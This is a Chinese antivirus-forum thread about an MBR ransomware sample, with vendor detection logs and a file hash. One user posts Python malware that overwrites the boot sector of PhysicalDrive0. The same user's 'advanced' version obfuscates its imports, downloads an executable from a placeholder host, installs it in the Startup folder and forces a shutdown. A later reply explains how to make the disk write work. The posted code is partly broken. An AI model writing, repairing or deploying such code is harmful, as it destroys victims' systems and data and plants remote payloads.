MBR勒索

显示全部楼层 · 发表于 2023-2-5 19:30:27

类型:木马-Win32/Trojan.Foreign.HgIAS8EA
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Users\360全家桶\Downloads\MBRLocker\da87951c508b1365b01cf897b7656e28fe74e94dcdadd57a178704949b34855d
文件大小:696K (712,704 字节)
文件版本:1.0.0.0
文件描述:易语言程序
文件指纹（MD5）:295649234a333a5a73be70231ddab489
处理建议:隔离文件

显示全部楼层 · 发表于 2023-2-5 19:31:40

paul846586 发表于 2023-2-5 18:41
奇安信miss

罕遇老乡

显示全部楼层 · 发表于 2023-2-5 19:32:42

显示全部楼层 · 发表于 2023-2-5 19:58:48

python无名氏发表于 2023-2-5 19:12
貌似可以，用的实体机，没试过，也不敢试不过亲测如果是rb+以管理员身份运行是可以读取到的[:01: ...

我曾经也写过一个，同样也是没敢试，不知道能不能跑

newmbr="your computer is dying"
with open("\\\\..\\PhysicalDrive0","w",encoding="utf-8") as f:
f.write(newmbr)
f.close()

复制代码

还有进阶版——

a='o'+'s'
b=__import__(a)
c='r'+'e'+'q'+'u'+'e'+'s'+'t'+'s'
d=__import__(c)
import tkinter
import tkinter.messagebox as msgbox
u-r-l='http://xxx.com/1.exe'
msgbox.showinfo('hahaha~','你的电脑没啦！')
r=d.get(u-r-l)
with open('C:\ProgramData\1.exe','wb') as f:
f.write(r.content)
f.close
b.system('copy C:\ProgramData\1.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp')
newm-b-r="your computer is dying"
with open("\\\\..\\PhysicalDrive0","w",encoding="utf-8") as f:
f.write(newm-b-r)
f.close()
b.system('shutdown -s -t 0')

复制代码

显示全部楼层 · 发表于 2023-2-5 20:26:19

eset
日志
da87951c508b1365b01cf897b7656e28fe74e94dcdadd57a178704949b34855d - Win32/MBRlock.AQ 特洛伊木马的变量 - 已通过删除清除 [1]

显示全部楼层 · 发表于 2023-2-5 20:58:36

本帖最后由熊小度于 2023-2-5 21:00 编辑

腾管 kill

显示全部楼层 · 发表于 2023-2-5 21:14:37

wwwab 发表于 2023-2-5 19:58
我曾经也写过一个，同样也是没敢试，不知道能不能跑还有进阶版——

写入底层扇区需要用newm-b-r=b'xxxxxxx',再把w换成wb才行

话说用newm-b-r貌似不能当变量吧

可以改成newm_b_r

[病毒样本] MBR勒索

本帖子中包含更多资源